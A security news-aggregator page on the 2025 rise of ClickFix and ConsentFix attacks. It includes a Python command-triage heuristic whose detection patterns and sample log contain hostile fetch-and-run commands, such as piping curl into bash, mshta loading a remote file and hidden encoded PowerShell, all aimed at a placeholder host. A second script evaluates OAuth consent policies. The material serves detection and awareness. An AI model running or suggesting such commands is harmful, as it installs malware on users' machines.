Covered by 3 sources · 3 reports · Medium impact

ClickFix Malware Exploits Rise in 2025, Leveraging API and Social Media Ads

Updated 3h ago: new reporting from BleepingComputer, 9to5Mac
Aggregated by BrevFeed security · updated 4h ago

ClickFix has become a major method of malware delivery in 2025, utilizing deceptive techniques like fake prompts and API-driven servers. Researchers found these attacks often evade detection by exploiting user habits and leveraging social media ads to spread malware disguised as legitimate applications. This growing method underscores the importance of enhancing security awareness and defenses against social engineering tactics.

Key points

Overview of ClickFix Attacks

ClickFix is a social engineering attack method exploiting user habits, such as clicking through fake prompts. It tricks users into executing malicious commands, often without triggering traditional security measures.

Recent research by Bert-Jan Pals analyzed 3,000 ClickFix payloads, revealing API-driven servers distributing the malware, making detection more challenging.

Exploiting User Habits and Deceptive Prompts

These attacks work by exploiting ingrained user habits, such as interacting with CAPTCHAs or cookie prompts. Users inadvertently execute malicious code following seemingly benign instructions.

Microsoft's 2025 Digital Defense Report shows ClickFix was involved in 47% of initial-access cases, highlighting its widespread use.
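The mechanism described above is that a user pastes a command a fake prompt handed them, so the command itself is the best thing a defender has to inspect. The following added example (not from the page or any of the cited outlets) scores user-executed commands from a constructed log for fetch-and-run traits; the log format, indicator weights, threshold and sample lines are all assumptions made for illustration.

```python
"""Heuristic triage of user-executed commands for ClickFix-style
fetch-and-run behaviour.

Added example, not from the page or any cited outlet. Log format, weights,
threshold and the sample lines are all constructed for illustration.
"""
import re
from dataclasses import dataclass

# Each indicator is a sign that a command pulls content from the network,
# hands it to an interpreter, or hides what it is doing. Weights are an
# assumption; tune them against your own baseline of benign commands.
INDICATORS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|irm|Invoke-RestMethod)\b", re.I), 2, "remote fetch"),
    (re.compile(r"https?://", re.I), 1, "URL literal"),
    (re.compile(r"\|\s*(sh|bash|zsh|iex|Invoke-Expression)\b", re.I), 3, "pipe to interpreter"),
    (re.compile(r"-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I), 3, "encoded PowerShell command"),
    (re.compile(r"\b(mshta|rundll32|regsvr32)\b", re.I), 2, "LOLBin launcher"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 2, "hidden window"),
    (re.compile(r"base64\s+(-d|--decode)\b|FromBase64String", re.I), 2, "base64 decode"),
    # Assumption: verification-themed text trailing a command is the lure
    # text the fake prompt told the user to paste along with it.
    (re.compile(r"I am not a robot|verification", re.I), 3, "CAPTCHA lure text"),
]
THRESHOLD = 5  # assumption: scores at or above this are escalated


@dataclass
class Verdict:
    source: str
    user: str
    command: str
    score: int
    reasons: list


def score_command(command: str):
    """Return (score, matched indicator labels) for one command line."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(command):
            score += weight
            reasons.append(label)
    return score, reasons


# Constructed log shape: "<timestamp> <source> user=<name> cmd=<command>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<source>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def triage(lines):
    """Return verdicts at or above THRESHOLD, highest score first."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        score, reasons = score_command(rec["cmd"])
        if score >= THRESHOLD:
            hits.append(Verdict(rec["source"], rec["user"], rec["cmd"], score, reasons))
    return sorted(hits, key=lambda v: v.score, reverse=True)


# Constructed sample: three benign commands and three ClickFix-shaped ones.
SAMPLE_LOG = [
    "2025-11-03T10:02:11Z shell-history user=alice cmd=git status",
    "2025-11-03T10:05:40Z shell-history user=alice cmd=brew install jq",
    "2025-11-03T10:07:02Z ps-history user=bob cmd=Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
    "2025-11-03T10:09:13Z terminal user=carol cmd=curl -fsSL https://example.invalid/install.sh | bash",
    "2025-11-03T10:11:58Z run-dialog user=dave cmd=mshta https://example.invalid/x.hta # I am not a robot - Verification ID 7361",
    "2025-11-03T10:13:27Z run-dialog user=erin cmd=powershell -w hidden -enc " + "Q" * 48,
]

if __name__ == "__main__":
    for v in triage(SAMPLE_LOG):
        print(f"{v.score:>2} {v.source:<13} {v.user:<6} {', '.join(v.reasons)}")
```

Run as-is it escalates the three pasted-looking commands and leaves the plain `Invoke-WebRequest` download below the threshold, which is the point of weighting the pipe-to-interpreter and lure-text indicators above a bare URL.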

Social Media's Role in Malware Spread

According to Jamf Threat Labs, a social media ad for a fake app led users to a malicious domain. The ad delivered a ClickFix-style attack that installed malware while posing as a legitimate app.

The attack showcased the role of social media in propagating malware, further complicating efforts to protect users.

Security Implications and Future Concerns

The rise of ClickFix emphasizes the need for enhanced security measures and awareness. By evading conventional security tools, these attacks underscore the importance of updated defenses against evolving social engineering tactics.

This summary was generated by AI from the outlets' reporting listed below. It is not independently verified and may contain errors; check the original sources.

How outlets covered it

Jamf Threat Labs reported a ClickFix-style attack using a sponsored ad on X that led to malware. The ad, masquerading as the legitimate app DynamicLake, redirected users to a malicious domain that prompted Terminal code input to install malware.

Attackers can hijack Microsoft 365 accounts in seconds using ClickFix and ConsentFix techniques. These methods exploit user habits with deceptive prompts and OAuth consent flows, allowing unauthorized access without traditional security interactions.
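The OAuth consent path described above works because a user is allowed to grant an app broad permissions on their own. The following added example (not from the page or any cited outlet) evaluates a consent request against a weak and a hardened policy; scope names follow Microsoft Graph naming as an assumption about the environment, and the policies, app ids and requests are constructed for illustration.

```python
"""Consent-policy evaluation for OAuth app grants, as a defence against
consent-phishing (ConsentFix-style) flows.

Added example, not from the page or any cited outlet. Scope names follow
Microsoft Graph naming (an assumption about the environment); the policies,
app ids and requests are constructed for illustration.
"""
from dataclasses import dataclass

# Assumption: these scopes give an app standing access to mail, files or
# the directory, or a refresh token (offline_access), so they should never
# be self-granted by an end user.
HIGH_RISK_SCOPES = frozenset({
    "Mail.ReadWrite", "Mail.Send", "Files.ReadWrite.All",
    "Directory.ReadWrite.All", "offline_access",
})
LOW_RISK_SCOPES = frozenset({"openid", "profile", "email", "User.Read"})


@dataclass(frozen=True)
class ConsentRequest:
    app_id: str
    publisher_verified: bool
    scopes: frozenset
    granted_by_admin: bool = False


@dataclass(frozen=True)
class ConsentPolicy:
    allow_user_consent: bool          # whether end users may consent at all
    require_verified_publisher: bool  # reject self-consent to unverified apps
    user_consent_scopes: frozenset    # scopes a user may self-grant
    allowlisted_apps: frozenset = frozenset()


# Weak setting: any user may consent to any app for any scope.
WEAK_POLICY = ConsentPolicy(True, False, HIGH_RISK_SCOPES | LOW_RISK_SCOPES)
# Hardened setting: users may self-grant only low-risk scopes, and only to
# apps from a verified publisher; everything else goes to an administrator.
HARDENED_POLICY = ConsentPolicy(True, True, LOW_RISK_SCOPES)


def evaluate(req: ConsentRequest, policy: ConsentPolicy):
    """Return (decision, reason); decision is allow, admin_review or deny."""
    if req.app_id in policy.allowlisted_apps:
        return "allow", "allow-listed app"
    if req.granted_by_admin:
        return "allow", "granted by an administrator"
    if not policy.allow_user_consent:
        return "admin_review", "user consent disabled by policy"
    if policy.require_verified_publisher and not req.publisher_verified:
        if req.scopes & HIGH_RISK_SCOPES:
            return "deny", "unverified publisher requesting high-risk scopes"
        return "admin_review", "unverified publisher"
    excess = req.scopes - policy.user_consent_scopes
    if excess:
        return "admin_review", "scopes beyond user-consent limit: " + ", ".join(sorted(excess))
    return "allow", "permitted scopes from a permitted publisher"


# Constructed requests: the kind of grant a consent lure asks for, and a
# benign sign-in grant for comparison.
LURE_REQUEST = ConsentRequest("constructed-app-id-0001", False,
                              frozenset({"Mail.ReadWrite", "offline_access", "User.Read"}))
BENIGN_REQUEST = ConsentRequest("constructed-app-id-0002", True,
                                frozenset({"openid", "User.Read"}))

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        for label, req in (("lure", LURE_REQUEST), ("benign", BENIGN_REQUEST)):
            print(f"{name:<9} {label:<7} -> {evaluate(req, policy)}")
```

Under the weak policy the lure's request for mailbox access plus a refresh token is allowed with one click; under the hardened policy it is refused outright, while the same scopes from a verified publisher are routed to an administrator instead of the user.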

Research by Bert-Jan Pals details a new API-driven method for delivering malware via ClickFix, utilizing on-demand backend servers. This advancement allows attackers to distribute tailored malicious payloads that evade traditional detection methods, heightening security concerns for users and organizations.